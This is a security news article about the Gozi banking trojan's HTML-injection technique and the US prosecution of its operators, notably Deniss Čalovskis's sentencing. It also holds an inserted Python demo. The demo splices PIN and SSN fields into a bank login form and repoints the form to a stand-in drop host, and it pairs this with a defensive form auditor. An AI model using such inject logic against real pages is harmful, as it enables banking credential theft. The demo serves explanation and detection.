We’ve been following a law enforcement saga surrounding malware called Gozi for two years now.
Gozi was a widespread and successful family of zombie malware, dating right back to 2007, that aimed to steal online banking credentials using a sneaky trick known as HTML injection.
Instead of trying to hack the bank’s online banking server infrastructure, or trying to intercept your HTTPS traffic in transit, which typically causes certificate warnings in your browser, the Gozi crooks used malware to hack your browser’s behaviour, right on your own computer.
Just before your browser displayed online banking forms (in other words, after the bank’s web pages had been received in good order and decrypted without warnings), the malware would inject additional data items into the page, requesting information you wouldn’t normally need to disclose, which was then sent off to the crooks rather than the bank.
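To make the mechanics of a web inject concrete, here is an added example (not Gozi's code, and not from the original article) that models the two halves of the story: a simplified stand-in for the browser-side injection, which splices extra inputs into an already-decrypted login form and can repoint the form's action, and the kind of audit a defender can run to spot fields and submit targets the bank never served. The form, the hostnames bank.example and drop.example, and the field names are all constructed for the demonstration.

```python
from html.parser import HTMLParser

# Constructed sample: a minimal online-banking login form as the bank serves it.
LEGIT_LOGIN_FORM = """
<form id="login" action="https://bank.example/login" method="post">
  <label>User ID <input type="text" name="userid"></label>
  <label>Password <input type="password" name="password"></label>
  <input type="submit" value="Log in">
</form>
"""

# What the bank's login page is expected to contain (assumed for this example).
EXPECTED_FIELDS = {"userid", "password"}
EXPECTED_ACTION = "https://bank.example/login"


def inject_fields(html, extra_fields, action=None):
    """Simplified stand-in for a man-in-the-browser web inject.

    The page has already arrived over HTTPS and been decrypted, so no
    certificate warning is involved: extra inputs are spliced in before the
    submit button, and the form can optionally be repointed at a hypothetical
    attacker-controlled action URL.
    """
    snippet = "".join(
        f'  <label>{label} <input type="text" name="{name}"></label>\n'
        for name, label in extra_fields
    )
    marker = '  <input type="submit"'
    if marker not in html:
        raise ValueError("no submit button to splice before")
    patched = html.replace(marker, snippet + marker, 1)
    if action is not None:
        patched = patched.replace(
            f'action="{EXPECTED_ACTION}"', f'action="{action}"', 1
        )
    return patched


class FormAuditor(HTMLParser):
    """Collects every named <input> and every <form> action on a page."""

    def __init__(self):
        super().__init__()
        self.fields = []
        self.actions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        elif tag == "input" and a.get("name"):
            self.fields.append(a["name"])


def audit_form(html, expected_fields=EXPECTED_FIELDS,
               expected_action=EXPECTED_ACTION):
    """Return (unexpected_fields, unexpected_actions) found in the page.

    Both lists are empty for the form the bank actually served; any extra
    input name or any submit target other than the bank's own is a sign the
    page was altered after delivery.
    """
    parser = FormAuditor()
    parser.feed(html)
    unexpected_fields = sorted(set(parser.fields) - set(expected_fields))
    unexpected_actions = sorted(set(parser.actions) - {expected_action})
    return unexpected_fields, unexpected_actions


if __name__ == "__main__":
    tampered = inject_fields(
        LEGIT_LOGIN_FORM,
        [("atm_pin", "ATM PIN"), ("ssn", "Social Security number")],
        action="https://drop.example/collect",
    )
    print("clean page:", audit_form(LEGIT_LOGIN_FORM))
    print("injected page:", audit_form(tampered))
```

The caveat that matters in practice: a trojan that can rewrite the bank's page inside the browser can just as easily rewrite or remove any JavaScript check the bank ships with it, so an audit like this is only trustworthy when it runs outside the compromised browser, for example server-side by rejecting any POST that carries field names the served form never had, or by comparing a DOM snapshot reported by the client against what the server actually sent.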
Back in 2013, the US Department of Justice (DoJ) wrote up its indictment of three men in New York.
Mihai Ionut Paunescu, out of Romania, ran what are known as “bulletproof hosts” for the enterprise. Think of him as the CIO.
Legitimate ISPs will offer you mirroring and automatic failover for your servers in order to ensure maximum uptime.
But the so-called bulletproofers go one step further, moving your services around online not just to cover for hardware failures and outages, but also to deal with takedowns, blocklisting and other crime-fighting measures.
Deniss Čalovskis of Latvia was the HTML injection expert, coding up the HTML modifications used to trick the victims and steal their account information. Let’s call him the Senior Web Consultant.
And Nikita Kuzmin from Russia was the COO. He hired coders to work on the Gozi malware and operated a Crimeware-as-a-Service (CaaS) business based around it.
You could lease time on Kuzmin’s botnet infrastructure, hosted by Paunescu, using data-stealing content authored by Čalovskis, and manage your entire crooked enterprise through a web portal on Kuzmin’s so-called 76 Service infrastructure.
As we wrote at the time, the DoJ listed, as is its habit, the maximum possible custodial sentences that the trio could pick up, assuming they were convicted and the court threw the book at them: absurd, and even impossible, periods from 60 to 95 years.
Things then got interesting for Čalovskis, who was in Latvia, because courts in his country didn’t like the sound of a theoretical 67-year prison sentence, as mentioned in the indictment, so his extradition to the USA was halted.
As we suggested at the time, it seemed that the US had “risked upsetting the delicate balance required to ensure worldwide prosecutions [typical in cybercrime] can be effectively completed.”
But the Latvians and the Americans eventually found common ground, and in February 2015, Čalovskis was sent to the US.
We reported at the time of his court case:
The reason why Latvian authorities eventually handed him over appears to surround a plea agreement in which Calovskis agreed not to submit an appeal should he be sentenced to two years or less of imprisonment – a hint as to what may happen on 14 December 2015 at his sentencing hearing.
In Čalovskis’s favour, he quickly pleaded guilty, and avoided making excuses, telling the court, “I knew what I was doing was against the law.”
That was in September 2015; he has now been sentenced.
It seems that Čalovskis’s prison sentence will be “time served,” meaning that his incarceration while awaiting extradition, trial and sentencing is considered sufficient punishment already.
That adds up to 21 months, which is indeed below the two-year no-appeal period mentioned above.
In other words, he should be home soon, years after this all started.
To paraphrase Henry Longfellow: The justice wheels grind slowly/Yet they grind exceeding small.